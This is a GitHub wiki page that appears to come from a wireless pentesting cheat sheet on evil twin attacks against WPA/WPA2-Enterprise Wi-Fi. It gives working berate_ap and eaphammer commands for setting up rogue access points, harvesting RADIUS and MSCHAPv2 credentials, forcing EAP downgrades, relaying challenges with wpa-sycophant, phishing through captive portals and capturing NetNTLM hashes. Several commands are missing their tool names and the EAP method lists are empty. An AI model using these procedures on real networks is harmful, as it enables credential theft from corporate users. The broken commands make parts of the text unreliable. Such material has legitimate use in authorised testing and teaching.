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13. WPA WPA2 Enterprise (MGT) Rogue AP Evil Twin

Koutto edited this page Nov 1, 2020 · 1 revision

Evil Twin Attack againt WPA/WPA2-Enterprise is only possible if:

  • EAP method in use does not use client-certificate for client authentication (like EAP-TLS, PEAPv0(EAP-TLS)) because there is no credentials to steal in this case.
  • EAP method in use does not enforce Server-side certificate (i.e. EAP-MD5, LEAP) or the EAP deployment does not enforce Server certificates validation on workstations (or client manually accept the invalid certificate, when possible).


  • Efficient against Android phones.
  • Efficient against iOS but it prompt for certificate.
  • Only a challenge-response against Windows can be captured.

WPA/WPA2-Enterprise AP Evil Twin + RADIUS Credentials Stealing

This type of attack can be used to steal RADIUS credentials (cleartext or more often challenge/response, e.g. MSCHAPv2) when EAP with credentials-based client authentication is used.

With berate_ap:

  1. (optional) To be more convincing, certificate presented to users when authenticating should be similar to the legitimate cert. Cert in use by legitimate AP can be extracted from network capture using:
./ -r <capture file>
./ -i mon0
  1. Create Enterprise Network (will ask for info to use in generated certificate) & capture EAP creds:
berate_ap --eap --mana-wpe --mana-credout <file_captured_creds> <interface_AP> <interface_internet> <SSID>

EAP modes - at least - supported: :

  • EAP-PEAP/MSCHAPv2 (both PEAPv0 and PEAPv1)
  • EAP-PEAP/GTC (both PEAPv0 and PEAPv1)
  • EAP-PEAP/MD5 (both PEAPv0 and PEAPv1)
  • EAP-MD5

With eaphammer:

  1. Generate self-signed x.509 certificates
./eaphammer --cert-wizard

Info about certificates:

  1. Launch Evil Twin Attack against WPA-Enterprise AP & capture EAP creds:
./eaphammer -i wlan0 --channel <channel_number> --auth wpa-eap \
 --essid <SSID_corporate_wifi> --creds  # Use WPA2 by default

EAP Downgrade Attack

Balanced Approach (most effective)

When using eaphammer, default behavior is to use a balanced approach of EAP Downgrade. It suggests the following sequences of EAP methods during EAP negotiation:

# Phase 1 (outer authentication)

# Phase 2  (inner authentication)

Eaphammer first attempts to downgrade to GTC, and then immediately falls back to stronger EAP methods if the attempt fails. This balanced approach is designed to maximize impact while minimizing the risk of protracted EAP negotiations.


Full EAP downgrade (from weakest to strongest)

./eaphammer -i wlan0 --channel <channel_number> --auth wpa-eap  \
 --essid <SSID_corporate_wifi> --negotiate weakest --creds

In this case, eaphammer propose the EAP methods in that order:

# Phase 1 (outer authentication)

# Phase 2 (inner authentication)

Warning: More likely to increase EAP negotation time (low probability that PAP, MD5, CHAP succeed), which might decrease effectiveness of attack !

Speed Optimized Approach (from strongest to weakest)

./eaphammer -i wlan0 --channel <channel_number> --auth wpa-eap  \
 --essid <SSID_corporate_wifi> --negotiate speed --creds

In this case, eaphammer propose the EAP methods that are most likely to succeed first:

# Phase 1 (outer authentication)

# Phase 2 (inner authentication)

Use this mode if you have trouble getting clients to finish the EAP authentication process using the default mode.

WPA/WPA2-Enterprise AP Evil Twin + EAP (MSCHAPv2) Relay

This attack can be used when EAP method uses MSCHAPv2 for client authentication. It relays challenge/response to the original AP to be able to connect to the network without having to crack MSCHAPv2 credentials.

  1. Spawn Evil Twin AP:
berate_ap --eap --mana-wpe --wpa-sycophant --mana-credout <file_captured_creds> \
<interface_AP> <interface_internet> <SSID>
  1. Create configuration file for wpa-sycophant, based on this example:
  # The SSID you would like to relay and authenticate against.
  # Do not modify
  # This initialises the variables for me.
  # -------------
  phase1="crypto_binding=0 peaplabel=0"
  # Dont want to connect back to ourselves,
  # so add your rogue BSSID here.
  1. Run wpa-sycophant:
./ -c wpa_sycophant_example.conf -i <interface>

RADIUS Credentials Management

Important: Further attacks on WPA-Enterprise network require knowledge of client's RADIUS credentials in most EAP methods (EAP methods requiring mutual authentication, like MSCHAPv2)

RADIUS credentials must be added to hostapd's eap_user file. In eaphammer, an interface is available:

./ehdb --list  # List creds in local db
./ehdb --add --identity <username> --password <password>  # Add creds in db
./ehdb --add --identity <username> --nt-hash <ntlm_hash>  # Add creds with NTLM hash in db
./ehdb --delete --identity-is <username>  # Delete entry from db
./ehdb --delete --delete-all  # Delete all entries in db


WPA/WPA2-Enterprise AP Evil Twin + Captive Portal Attack

Important: Require knowledge of client's RADIUS credentials (added into hostapd's eap_user file) in most EAP methods (EAP methods requiring mutual authentication, like MSCHAPv2).

./eaphammer -i wlan0 --channel <channel_number> --auth wpa-eap \
 --essid <SSID_corporate_wifi> --captive-portal

For best results on phishing:

  • Clone page (wget),
  • Copy cloned web page in /var/www/html/ directory(eaphammer serves webpage from here according to default Apache2 configuration).

WPA/WPA2-Enterprise AP Evil Twin + NetNTLM Hash Capture

Important: Require knowledge of client's RADIUS credentials (added into hostapd's eap_user file) in most EAP methods (EAP methods requiring mutual authentication, like MSCHAPv2).

Hostile portal attack redirects HTTP traffic to an SMB share located on the attacker's machine:

./eaphammer -i wlan0 --channel <channel_number> --auth wpa-eap \
 --essid <SSID_corporate_wifi> --hostile-portal
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